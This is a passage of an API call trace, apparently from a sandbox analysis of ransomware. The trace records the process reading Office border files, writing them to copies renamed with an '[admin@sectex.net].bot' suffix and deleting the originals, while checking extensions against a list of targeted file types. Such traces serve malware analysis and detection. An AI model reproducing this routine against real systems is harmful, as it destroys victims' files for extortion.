	[0156.598] lstrlenW (lpString=".bz2") returned 4
	[0156.598] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.598] lstrlenW (lpString=".7z") returned 3
	[0156.598] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.598] lstrlenW (lpString=".dbf") returned 4
	[0156.598] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.598] lstrlenW (lpString=".1cd") returned 4
	[0156.598] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.598] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART5.BDR") returned 61
	[0156.599] lstrlenW (lpString=".jpg") returned 4
	[0156.599] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.599] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.599] lstrlenW (lpString="MSART6.BDR") returned 10
	[0156.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.601] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=55222) returned 1
	[0156.601] CloseHandle (hObject=0x3d4) returned 1
	[0156.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr")) returned 0x20
	[0156.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.601] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.601] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.602] GetLastError () returned 0x0
	[0156.602] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xd7b6, lpOverlapped=0x0) returned 1
	[0156.604] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xd7c0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xd7c0, lpOverlapped=0x0) returned 1
	[0156.610] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.610] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0156.611] SetEndOfFile (hFile=0x3b0) returned 1
	[0156.611] CloseHandle (hObject=0x3b0) returned 1
	[0156.611] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.611] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.613] CloseHandle (hObject=0x3d4) returned 1
	[0156.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.614] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart6.bdr")) returned 1
	[0156.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.615] lstrlenW (lpString=".doc") returned 4
	[0156.615] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.615] lstrlenW (lpString=".docx") returned 5
	[0156.615] lstrcmpiW (lpString1=".docx", lpString2="6.BDR") returned -1
	[0156.615] lstrlenW (lpString=".pdf") returned 4
	[0156.615] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.615] lstrlenW (lpString=".xls") returned 4
	[0156.615] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.616] lstrlenW (lpString=".xlsx") returned 5
	[0156.616] lstrcmpiW (lpString1=".xlsx", lpString2="6.BDR") returned -1
	[0156.616] lstrlenW (lpString=".ppt") returned 4
	[0156.616] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.616] lstrlenW (lpString=".zip") returned 4
	[0156.616] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.616] lstrlenW (lpString=".rar") returned 4
	[0156.616] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.616] lstrlenW (lpString=".bz2") returned 4
	[0156.616] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.616] lstrlenW (lpString=".7z") returned 3
	[0156.616] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.616] lstrlenW (lpString=".dbf") returned 4
	[0156.616] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.616] lstrlenW (lpString=".1cd") returned 4
	[0156.616] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.616] lstrlenW (lpString=".jpg") returned 4
	[0156.616] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.616] lstrlenW (lpString=".doc") returned 4
	[0156.616] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.617] lstrlenW (lpString=".docx") returned 5
	[0156.617] lstrcmpiW (lpString1=".docx", lpString2="6.BDR") returned -1
	[0156.617] lstrlenW (lpString=".pdf") returned 4
	[0156.617] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.617] lstrlenW (lpString=".xls") returned 4
	[0156.617] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.617] lstrlenW (lpString=".xlsx") returned 5
	[0156.617] lstrcmpiW (lpString1=".xlsx", lpString2="6.BDR") returned -1
	[0156.617] lstrlenW (lpString=".ppt") returned 4
	[0156.617] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.617] lstrlenW (lpString=".zip") returned 4
	[0156.617] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.617] lstrlenW (lpString=".rar") returned 4
	[0156.617] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.617] lstrlenW (lpString=".bz2") returned 4
	[0156.617] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.617] lstrlenW (lpString=".7z") returned 3
	[0156.617] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.617] lstrlenW (lpString=".dbf") returned 4
	[0156.617] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.617] lstrlenW (lpString=".1cd") returned 4
	[0156.617] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART6.BDR") returned 61
	[0156.617] lstrlenW (lpString=".jpg") returned 4
	[0156.617] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.618] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.618] lstrlenW (lpString="MSART7.BDR") returned 10
	[0156.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart7.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.618] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=3876) returned 1
	[0156.618] CloseHandle (hObject=0x3d4) returned 1
	[0156.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart7.bdr")) returned 0x20
	[0156.618] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart7.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart7.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.619] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.619] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart7.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.619] GetLastError () returned 0x0
	[0156.619] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xf24, lpOverlapped=0x0) returned 1
	[0156.621] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf30, lpOverlapped=0x0) returned 1
	[0156.622] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.622] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0156.622] SetEndOfFile (hFile=0x3b0) returned 1
	[0156.623] CloseHandle (hObject=0x3b0) returned 1
	[0156.623] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.623] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.625] CloseHandle (hObject=0x3d4) returned 1
	[0156.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.625] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart7.bdr")) returned 1
	[0156.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.626] lstrlenW (lpString=".doc") returned 4
	[0156.626] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.626] lstrlenW (lpString=".docx") returned 5
	[0156.626] lstrcmpiW (lpString1=".docx", lpString2="7.BDR") returned -1
	[0156.626] lstrlenW (lpString=".pdf") returned 4
	[0156.626] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.626] lstrlenW (lpString=".xls") returned 4
	[0156.626] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.626] lstrlenW (lpString=".xlsx") returned 5
	[0156.626] lstrcmpiW (lpString1=".xlsx", lpString2="7.BDR") returned -1
	[0156.626] lstrlenW (lpString=".ppt") returned 4
	[0156.626] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.626] lstrlenW (lpString=".zip") returned 4
	[0156.626] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.626] lstrlenW (lpString=".rar") returned 4
	[0156.626] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.626] lstrlenW (lpString=".bz2") returned 4
	[0156.626] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.626] lstrlenW (lpString=".7z") returned 3
	[0156.626] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.626] lstrlenW (lpString=".dbf") returned 4
	[0156.626] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.626] lstrlenW (lpString=".1cd") returned 4
	[0156.627] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.627] lstrlenW (lpString=".jpg") returned 4
	[0156.627] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.627] lstrlenW (lpString=".doc") returned 4
	[0156.627] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.627] lstrlenW (lpString=".docx") returned 5
	[0156.627] lstrcmpiW (lpString1=".docx", lpString2="7.BDR") returned -1
	[0156.627] lstrlenW (lpString=".pdf") returned 4
	[0156.627] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.627] lstrlenW (lpString=".xls") returned 4
	[0156.627] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.627] lstrlenW (lpString=".xlsx") returned 5
	[0156.627] lstrcmpiW (lpString1=".xlsx", lpString2="7.BDR") returned -1
	[0156.627] lstrlenW (lpString=".ppt") returned 4
	[0156.627] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.627] lstrlenW (lpString=".zip") returned 4
	[0156.627] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.627] lstrlenW (lpString=".rar") returned 4
	[0156.627] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.627] lstrlenW (lpString=".bz2") returned 4
	[0156.627] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.627] lstrlenW (lpString=".7z") returned 3
	[0156.627] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.627] lstrlenW (lpString=".dbf") returned 4
	[0156.627] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.628] lstrlenW (lpString=".1cd") returned 4
	[0156.628] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART7.BDR") returned 61
	[0156.628] lstrlenW (lpString=".jpg") returned 4
	[0156.628] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.628] lstrcmpiW (lpString1=".BDR", lpString2=".bot") returned -1
	[0156.628] lstrlenW (lpString="MSART8.BDR") returned 10
	[0156.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.628] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=49098) returned 1
	[0156.628] CloseHandle (hObject=0x3d4) returned 1
	[0156.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr")) returned 0x20
	[0156.629] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0156.629] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.629] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0156.630] GetLastError () returned 0x0
	[0156.630] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xbfca, lpOverlapped=0x0) returned 1
	[0156.632] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xbfd0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xbfd0, lpOverlapped=0x0) returned 1
	[0156.634] ReadFile (in: hFile=0x3d4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.634] WriteFile (in: hFile=0x3b0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0156.634] SetEndOfFile (hFile=0x3b0) returned 1
	[0156.634] CloseHandle (hObject=0x3b0) returned 1
	[0156.634] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.634] SetEndOfFile (hFile=0x3d4) returned 1
	[0156.637] CloseHandle (hObject=0x3d4) returned 1
	[0156.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.637] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\borders\\msart8.bdr")) returned 1
	[0156.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.638] lstrlenW (lpString=".doc") returned 4
	[0156.638] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.638] lstrlenW (lpString=".docx") returned 5
	[0156.638] lstrcmpiW (lpString1=".docx", lpString2="8.BDR") returned -1
	[0156.638] lstrlenW (lpString=".pdf") returned 4
	[0156.638] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.638] lstrlenW (lpString=".xls") returned 4
	[0156.638] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.638] lstrlenW (lpString=".xlsx") returned 5
	[0156.638] lstrcmpiW (lpString1=".xlsx", lpString2="8.BDR") returned -1
	[0156.638] lstrlenW (lpString=".ppt") returned 4
	[0156.638] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.638] lstrlenW (lpString=".zip") returned 4
	[0156.638] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.638] lstrlenW (lpString=".rar") returned 4
	[0156.638] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.638] lstrlenW (lpString=".bz2") returned 4
	[0156.638] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.638] lstrlenW (lpString=".7z") returned 3
	[0156.638] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.638] lstrlenW (lpString=".dbf") returned 4
	[0156.638] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.638] lstrlenW (lpString=".1cd") returned 4
	[0156.639] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
	[0156.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.639] lstrlenW (lpString=".jpg") returned 4
	[0156.639] lstrcmpiW (lpString1=".jpg", lpString2=".BDR") returned 1
	[0156.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.639] lstrlenW (lpString=".doc") returned 4
	[0156.639] lstrcmpiW (lpString1=".doc", lpString2=".BDR") returned 1
	[0156.639] lstrlenW (lpString=".docx") returned 5
	[0156.639] lstrcmpiW (lpString1=".docx", lpString2="8.BDR") returned -1
	[0156.639] lstrlenW (lpString=".pdf") returned 4
	[0156.639] lstrcmpiW (lpString1=".pdf", lpString2=".BDR") returned 1
	[0156.639] lstrlenW (lpString=".xls") returned 4
	[0156.639] lstrcmpiW (lpString1=".xls", lpString2=".BDR") returned 1
	[0156.639] lstrlenW (lpString=".xlsx") returned 5
	[0156.639] lstrcmpiW (lpString1=".xlsx", lpString2="8.BDR") returned -1
	[0156.639] lstrlenW (lpString=".ppt") returned 4
	[0156.639] lstrcmpiW (lpString1=".ppt", lpString2=".BDR") returned 1
	[0156.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.639] lstrlenW (lpString=".zip") returned 4
	[0156.639] lstrcmpiW (lpString1=".zip", lpString2=".BDR") returned 1
	[0156.639] lstrlenW (lpString=".rar") returned 4
	[0156.639] lstrcmpiW (lpString1=".rar", lpString2=".BDR") returned 1
	[0156.639] lstrlenW (lpString=".bz2") returned 4
	[0156.639] lstrcmpiW (lpString1=".bz2", lpString2=".BDR") returned 1
	[0156.639] lstrlenW (lpString=".7z") returned 3
	[0156.639] lstrcmpiW (lpString1=".7z", lpString2="BDR") returned -1
	[0156.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.639] lstrlenW (lpString=".dbf") returned 4
	[0156.639] lstrcmpiW (lpString1=".dbf", lpString2=".BDR") returned 1
	[0156.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\BORDERS\\MSART8.BDR") returned 61
	[0156.640] lstrlenW (lpString=".1cd") returned 4
	[0156.640] lstrcmpiW (lpString1=".1cd", lpString2=".BDR") returned -1
